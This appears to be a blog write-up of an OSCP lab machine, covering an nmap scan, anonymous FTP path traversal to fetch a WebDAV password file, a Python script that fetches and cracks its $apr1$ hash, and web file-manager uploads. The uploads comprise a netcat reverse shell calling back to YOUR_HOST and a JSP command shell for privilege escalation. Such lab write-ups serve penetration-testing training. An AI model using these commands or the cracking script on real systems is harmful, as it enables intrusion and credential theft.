OSCP Admin-PC machine write-up - ICSS BLOG


Exploitation

Scan the machine with nmap:

nmap 192.168.x.55 -A

The interesting part of the output is the FTP service on port 21: the banner identifies Home Ftp Server, and the ftp-anon script reports that anonymous login is allowed and the root directory is writeable:

21/tcp    open  ftp     syn-ack ttl 128
| fingerprint-strings:
|   GenericLines:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|     command not understood.
|     command not understood.
|   Help:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|     'HELP': command not understood.
|   NULL, SMBProgNeg:
|     220-Wellcome to Home Ftp Server!
|_    Server ready.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drw-rw-rw-   1 ftp      ftp            0 Dec 28  2015 . [NSE: writeable]
|_drw-rw-rw-   1 ftp      ftp            0 Dec 28  2015 .. [NSE: writeable]

Connect to the server as user anonymous with any password. The server does not confine the session to the FTP root, so a relative path with ../ walks up into the XAMPP installation and retrieves the WebDAV htpasswd file:

[root:~/Desktop]# ftp
ftp> o
(to) 192.168.x.55
Connected to 192.168.x.55.
220-Wellcome to Home Ftp Server!
220 Server ready.
Name (192.168.x.55:root): anonymous

331 Password required for anonymous.
Password:
230 User Anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../xampp/security/webdav.htpasswd
local: ../xampp/security/webdav.htpasswd remote: ../xampp/security/webdav.htpasswd
200 Port command successful.
150 Opening data connection for ../xampp/security/webdav.htpasswd.
226 File sent ok

The file contains a single htpasswd entry whose hash uses Apache's MD5 scheme (the $apr1$ prefix):
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
Crack it offline (john's md5crypt format and hashcat mode 1600 both handle $apr1$) to recover the plaintext:
fm:x-files
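As an added example (not code from the original write-up), the following Python script automates the two steps just described: pulling the htpasswd file over anonymous FTP with the same ../ traversal, and cracking the $apr1$ hash offline with a pure-Python implementation of Apache's MD5 scheme instead of john or hashcat. The target address, the anonymous password and the candidate wordlist are assumptions; the htpasswd line and the traversal path are the ones from the write-up.

```python
"""Anonymous-FTP traversal fetch plus offline $apr1$ cracking.
Added example for this write-up, not code from the original post.
The host, anonymous password and wordlist below are assumptions."""
import hashlib
import io
from ftplib import FTP

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def fetch_via_ftp(host, remote_path, user="anonymous", password="anon@"):
    """Log in and RETR a path relative to the FTP root. Home Ftp Server does
    not confine the session, so ../xampp/... is served from outside the share."""
    buf = io.BytesIO()
    with FTP(host, timeout=10) as ftp:
        ftp.login(user, password)
        ftp.retrbinary("RETR " + remote_path, buf.write)
    return buf.getvalue()


def _to64(value, length):
    """crypt(3)-style base-64: emit `length` chars, 6 bits each, LSB first."""
    return "".join(ITOA64[(value >> (6 * k)) & 0x3F] for k in range(length))


def apr1_crypt(password, salt):
    """Apache MD5 ($apr1$), the algorithm behind `htpasswd -m`."""
    pw, magic = password.encode(), b"$apr1$"
    salt = salt[:8]
    sb = salt.encode()
    ctx = hashlib.md5(pw + magic + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    pl = len(pw)
    while pl > 0:                       # mix in alt once per 16 bytes of pw
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                            # one byte per bit of len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):               # 1000 stretching rounds
        c = hashlib.md5(pw if r & 1 else final)
        if r % 3:
            c.update(sb)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    enc = ""                            # 16 bytes -> 22 chars, apr byte order
    for a, b, d in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        enc += _to64((final[a] << 16) | (final[b] << 8) | final[d], 4)
    enc += _to64(final[11], 2)
    return f"$apr1${salt}${enc}"


def parse_htpasswd(text):
    """Return {user: hash} from 'user:hash' lines, skipping comments."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and ":" in line:
            user, hsh = line.split(":", 1)
            creds[user] = hsh
    return creds


def verify_apr1(password, hashed):
    """True if `password` reproduces `hashed` ($apr1$<salt>$<digest>)."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash")
    return apr1_crypt(password, parts[2]) == hashed


def crack_apr1(hashed, wordlist):
    """Dictionary attack: first candidate that verifies, or None."""
    for cand in wordlist:
        if verify_apr1(cand, hashed):
            return cand
    return None


# The line recovered in the write-up and a small constructed wordlist.
HTPASSWD_FROM_WRITEUP = "fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1"
WORDLIST = ["password", "xampp", "admin", "x-files", "letmein"]

if __name__ == "__main__":
    # Live fetch (assumed lab address); uncomment when on the lab VPN.
    # HTPASSWD_FROM_WRITEUP = fetch_via_ftp(
    #     "192.168.x.55", "../xampp/security/webdav.htpasswd").decode()
    for user, hsh in parse_htpasswd(HTPASSWD_FROM_WRITEUP).items():
        print(user, "->", crack_apr1(hsh, WORDLIST))
```

Offline, the script checks the recovered line against the embedded wordlist; on the lab network, uncommenting the fetch pulls the file the same way the ftp session above does. The apr1 routine is the scheme john and hashcat implement, so anything that cracks here cracks there, but each candidate costs about a thousand MD5 calls, so use those tools for real wordlists.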
Now browse to 192.168.x.55:10433/admin and log in with fm:x-files. This is a web file manager that allows uploading executable files.

Start a listener on your host (nc -lvnp 443), upload nc.exe (netcat for Windows), then upload a PHP file that runs it with the path the file manager stored it under, e.g. system('nc.exe -vv YOUR_HOST 443 -e cmd.exe'). Requesting that PHP file makes the web server execute netcat, which connects back to your listener with cmd.exe attached, giving you a shell as the web server account.

Escalation

Use the file manager to upload a JSP command shell (a page that reads a cmd request parameter, runs it with Runtime.getRuntime().exec() and writes the output back) to c:/xampp/tomcat/webapps/examples, then browse to 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami. The Tomcat examples webapp is served from the same port and runs with administrative privileges, so the output of whoami shows that you are an admin.

More information about OSCP write-ups: click here
